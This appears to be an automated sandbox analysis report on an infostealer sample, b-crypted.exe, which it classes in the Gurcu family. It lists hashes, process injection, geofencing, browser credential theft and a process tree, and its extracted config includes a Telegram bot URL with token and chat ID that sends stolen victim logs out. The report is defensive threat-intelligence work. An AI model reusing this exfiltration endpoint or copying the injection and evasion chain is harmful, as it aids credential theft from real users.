Analysis
-
max time kernel
94s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-12-2024 18:38
Static task
static1
Behavioral task
behavioral1
Sample
b-crypted.exe
Resource
win7-20240708-en
General
-
Target
b-crypted.exe
-
Size
8.4MB
-
MD5
b45f3a137a961c8498ee21a246e983ec
-
SHA1
f7a2dc2bac844aad018498f224adf51f285c1f1b
-
SHA256
17cc88b4f9976d16cc5c807e91b034fecc721f9988cc52e2056a01e99aabc900
-
SHA512
ee339e5f4853c425d838493aa9fdac55273601482b804be183367118832d4677375daa46e08755d1f472725cb9d35612e570095f1afffe3db1d336fb139d20bc
-
SSDEEP
196608:HWIWSNScyO62XEXOV7QUY1MlROz8Uk2Ew2GdKxvY7n7wls8bg:NWSBybi7qelRc8UFAGwxAGs80
Malware Config
Extracted
gurcu
https://api.telegram.org/bot6031927554:AAEXTw-Bhx5o5i_JojmzmJzXPmNMBfive_Y/sendDocument?chat_id=918093463&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Signatures
-
Gurcu family
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation systemuser.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation tempdatalogger.exe -
Executes dropped EXE 2 IoCs
pid Process 1744 systemuser.exe 1452 tempdatalogger.exe -
Loads dropped DLL 2 IoCs
pid Process 1744 systemuser.exe 1452 tempdatalogger.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 18 raw.githubusercontent.com 19 raw.githubusercontent.com 34 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 40 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 4640 tasklist.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3668 set thread context of 1820 3668 b-crypted.exe 90 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b-crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier tempdatalogger.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 tempdatalogger.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 64 timeout.exe -
Suspicious behavior: EnumeratesProcesses 52 IoCs
pid Process 3668 b-crypted.exe 3668 b-crypted.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1744 systemuser.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe 1452 tempdatalogger.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3668 b-crypted.exe Token: SeDebugPrivilege 1744 systemuser.exe Token: SeDebugPrivilege 4640 tasklist.exe Token: SeDebugPrivilege 1452 tempdatalogger.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 3668 wrote to memory of 1144 3668 b-crypted.exe 89 PID 3668 wrote to memory of 1144 3668 b-crypted.exe 89 PID 3668 wrote to memory of 1144 3668 b-crypted.exe 89 PID 3668 wrote to memory of 1820 3668 b-crypted.exe 90 PID 3668 wrote to memory of 1820 3668 b-crypted.exe 90 PID 3668 wrote to memory of 1820 3668 b-crypted.exe 90 PID 3668 wrote to memory of 1820 3668 b-crypted.exe 90 PID 3668 wrote to memory of 1820 3668 b-crypted.exe 90 PID 3668 wrote to memory of 1820 3668 b-crypted.exe 90 PID 3668 wrote to memory of 1820 3668 b-crypted.exe 90 PID 3668 wrote to memory of 1820 3668 b-crypted.exe 90 PID 1820 wrote to memory of 1744 1820 RegAsm.exe 91 PID 1820 wrote to memory of 1744 1820 RegAsm.exe 91 PID 1744 wrote to memory of 5016 1744 systemuser.exe 94 PID 1744 wrote to memory of 5016 1744 systemuser.exe 94 PID 5016 wrote to memory of 2136 5016 cmd.exe 96 PID 5016 wrote to memory of 2136 5016 cmd.exe 96 PID 5016 wrote to memory of 4640 5016 cmd.exe 97 PID 5016 wrote to memory of 4640 5016 cmd.exe 97 PID 5016 wrote to memory of 4232 5016 cmd.exe 98 PID 5016 wrote to memory of 4232 5016 cmd.exe 98 PID 5016 wrote to memory of 64 5016 cmd.exe 99 PID 5016 wrote to memory of 64 5016 cmd.exe 99 PID 5016 wrote to memory of 1452 5016 cmd.exe 100 PID 5016 wrote to memory of 1452 5016 cmd.exe 100 PID 1452 wrote to memory of 4944 1452 tempdatalogger.exe 101 PID 1452 wrote to memory of 4944 1452 tempdatalogger.exe 101 PID 4944 wrote to memory of 1704 4944 cmd.exe 103 PID 4944 wrote to memory of 1704 4944 cmd.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\b-crypted.exe"C:\Users\Admin\AppData\Local\Temp\b-crypted.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:1144
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Users\Admin\AppData\Roaming\systemuser.exe"C:\Users\Admin\AppData\Roaming\systemuser.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp52ED.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp52ED.tmp.bat4⤵
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:2136
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1744"5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4640
-
-
C:\Windows\system32\find.exefind ":"5⤵PID:4232
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak5⤵
- Delays execution with timeout.exe
PID:64
-
-
C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpA5EF.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpA5EF.tmp.bat6⤵
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\system32\chcp.comchcp 650017⤵PID:1704
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
300B
MD5d88f63a793d6e94d0536aaa5d2ae8d04
SHA1db98c760b934b16d483a2e5fe754f09f9678090e
SHA25608b649aa13b688cd6d5882cd1f4c1e5f64ecc087ac61d5f81029090e29b8534a
SHA512cf6133c49799b3a73119649555f59c15018b3cfe0a69da67de637d523b8e0c5986d9c35945b6914f50d1d850896aad8ce512a8afc4d8a9772e27b8603248e5c7
-
Filesize
149B
MD59b50431381f90bb6149dbb5c85095c94
SHA13eed9d5a930e860d2308abec184946022a258a08
SHA256bc8d12c414c230d3c3d1e444a4a6af0bbe189ba0e810fd5aa3fd2873c5d32d4b
SHA512a581e798ff3db6780740d71e184b98acd42f11a7c7fcbf1416a3b24833a7b09a51487ef382eea5987d5bb3d4fc14cd12be0fef6ba388083b8818256cdfc30480
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
5.6MB
MD55328cd66093855fbb2127332ad78cdd6
SHA17605e73efa3a3bd1c42beddad226ccf355f80e4c
SHA25690daa714224ac1b53c423442d1cd0425bc678c721402ae757034258248d43106
SHA5120e4428281adf02fedaee64233fb63c1296009aa0dbe233036be841afb2bb5443769812389613ef696821cdc9750193599d2bda6b567b92301796bbea8a84098c